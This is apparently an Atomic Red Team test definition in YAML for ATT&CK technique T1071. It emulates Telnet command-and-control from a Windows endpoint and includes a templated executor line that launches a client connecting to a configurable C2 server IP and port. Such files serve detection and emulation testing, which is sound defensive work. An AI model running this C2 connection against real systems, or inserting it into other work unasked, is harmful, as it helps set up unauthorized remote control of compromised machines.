attack_technique: T1071
display_name: 'Application Layer Protocol'
atomic_tests:
- name: Telnet C2
  auto_generated_guid: 3b0df731-030c-4768-b492-2a3216d90e53
  description: |
    An adversary may establish Telnet communication from a compromised endpoint to a command and control (C2) server in order to carry out additional attacks on objectives.
  supported_platforms:
  - windows
  dependency_executor_name: powershell
  dependencies:
  - description: |
      A command and control (C2) server can be established by running PathToAtomicsFolder\T1071\bin\telnet_server.exe on a specified server with a specified IP that must be reachable by a client (telnet_client.exe)
    prereq_command: |
      $connection = Test-NetConnection -ComputerName #{server_ip} -Port #{server_port}
      if ($connection.TcpTestSucceeded) {exit 0} else {exit 1}
    get_prereq_command: |
      Write-Host "Setup C2 server manually"
  input_arguments:
    server_ip:
      description: C2 server IP or URL
      type: url
      default: 127.0.0.1  # Replace "127.0.0.1" with the actual IP or URL
    client_path:
      description: Client agent path
      type: path
      default: PathToAtomicsFolder\T1071\bin\telnet_client.exe  # Update the path if needed
    server_port:
      description: C2 server port
      type: integer
      default: 23
  executor:
    command: |
      #{client_path} #{server_ip} --port #{server_port}
    name: powershell